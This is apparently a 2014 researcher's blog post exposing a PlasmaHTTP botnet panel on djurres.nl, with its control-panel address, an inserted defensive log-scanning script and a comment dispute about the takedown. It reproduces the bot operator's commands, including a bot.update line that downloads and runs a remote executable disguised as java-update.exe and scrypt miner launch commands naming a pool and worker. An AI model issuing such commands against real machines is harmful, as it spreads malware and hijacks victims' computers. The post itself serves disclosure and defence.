Thursday, January 30, 2014

PlasmaHTTP botnet on djurres.nl

PlasmaHTTP botnet and other junk on djurres.nl.

Plasma bot is Windows-based malware that uses HTTP to communicate with its Command & Control server. Its primary functions are credential theft and DDoS. Not very sophisticated, but it gets the job done for many skids.

djurres.nl
185.28.23.63 - Hosting24 Servers, US
abuse@main-hosting.com

C&C:
hxxp://www.djurres.nl/plasma/cp.php?a=online

Login:



Main page:
~450 bots






Running commands:
bot.update http://djurres.nl/plasma/1-29-14.exe java-update.exe [X] 
miner.start http://djurres.nl/plasma/miner/CPUMiner.files *-a scrypt -o stratum+tcp://eu.multipool.us:7777 -O Djurres.2:x -t 4* [X] 
miner.gpu.start http://djurres.nl/plasma/miner/GPUMiner.files *-a scrypt -o stratum+tcp://eu.multipool.us:7777 -u Djurres.1 -p x -g yes* [X] 
wait [X]
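A defender-side detection pass over constructed log lines, as an added example that is not part of the original post: it flags the panel's cp.php?a=online check-in on any host (generalising beyond the one URL on this page), an .exe fetched from that same host by the same client (the bot.update pattern above), and connections to the stratum pool named in the miner.start command. The log format, client IPs, timestamps and benign lines are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample of a web-proxy/firewall log: timestamp, client, dest host, dest port,
# HTTP method and URL ("-" for a plain TCP connection). Panel host, cp.php?a=online check-in,
# .exe update and stratum pool are the ones in the post; the rest is made up.
SAMPLE_LOG = """\
2014-01-30T10:01:02 10.0.0.5 www.djurres.nl 80 GET http://www.djurres.nl/plasma/cp.php?a=online
2014-01-30T10:01:05 10.0.0.5 djurres.nl 80 GET http://djurres.nl/plasma/1-29-14.exe
2014-01-30T10:01:09 10.0.0.5 eu.multipool.us 7777 - -
2014-01-30T10:02:00 10.0.0.7 www.example.com 80 GET http://www.example.com/index.html
2014-01-30T10:02:30 10.0.0.9 panel.example.net 8080 GET http://panel.example.net/x/cp.php?a=online
"""

MINING_POOLS = {"eu.multipool.us"}  # pool host from the post's miner.start command
LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\d+) (\S+) (\S+)$")

def base_domain(h): return h[4:] if h.startswith("www.") else h  # www. and bare host = same panel

def classify(host, url):
    """Label one log line, or return None when nothing matches."""
    if host in MINING_POOLS:
        return "stratum_pool"
    parts = urlsplit(url)  # "-" (plain TCP connection) yields a path that never matches
    # Plasma panel check-in: .../cp.php?a=online, regardless of which host serves it
    if parts.path.endswith("/cp.php") and parse_qs(parts.query).get("a") == ["online"]:
        return "plasma_checkin"
    return None

def scan(log_text):
    """Parse and label the log, then correlate per client: an .exe fetched from a host
    the same client checked in to is flagged as a likely bot.update payload download."""
    rows, checkins, findings = [], {}, []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, client, host, _port, _method, url = m.groups()
        label = classify(host, url)
        if label == "plasma_checkin":
            checkins.setdefault(client, set()).add(base_domain(host))
        rows.append((ts, client, host, url, label))
    for ts, client, host, url, label in rows:
        if label is None and url.lower().endswith(".exe") \
                and base_domain(host) in checkins.get(client, set()):
            label = "plasma_update"
        if label:
            findings.append({"time": ts, "client": client, "host": host, "label": label})
    return findings
```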

Real Fact: Mining for Bitcoin has huge profit margins.
CPU and GPU ?!?! Woah bro. 1337.

DDoS? uber cool! 


Stats:


Password log:


Ok, now this is the pathetic part.
I almost felt bad taking this botnet down.

Yes, that is a directory called "A Hackers Folder".


His pet RAT collection:


And a library of eBooks on how to 'spread' his shitty public copy of Plasma bot. 


I thought I pulled a sample that the update script was running, but I guess not.

bot.update http://djurres.nl/plasma/1-29-14.exe java-update.exe [X] 

It's too late now anyway.





Xzibit says:
actually, you have some eBooks to read ... so sad.




2 comments:

  1. You talk a lot of trash when all you did was submit a takedown notice and illegally log into some guy's server... I doubt this kid's botnet was really 450 bots, all those offline bots were probably killed since he maxed out their machines with mining BTC.

    1. Anonymous Bozo,

      1. Operating a botnet is clearly and definitely illegal. Depending upon the use of a botnet, to commit banking fraud for example, an admin would be breaking many laws all at once.

      2. To combat the problem, incidents must be reported to network operators and ISPs. If they had the ability and/or the resources to deal with these issues, we would not have these problems in the first place. They appreciate the help. They say, "Thank you very much."

      2a. Most network operators take this kind of abuse very seriously. Reporting abuse that results in action like a "take down" requires coordination and hard evidence. Evidence like screenshots and login credentials. There is nothing illegal about touching a server while working with the ISP or NOC that actually owns the server. This wasn't "some guys server" it was owned by a US company and leased out to him after he agreed with an acceptable usage policy. This assumes the box wasn't just hacked into, but I seriously doubt that.

      You are entitled to your opinion and I respect that. However, my heckling of these little degenerate punks should be the least of your worries.
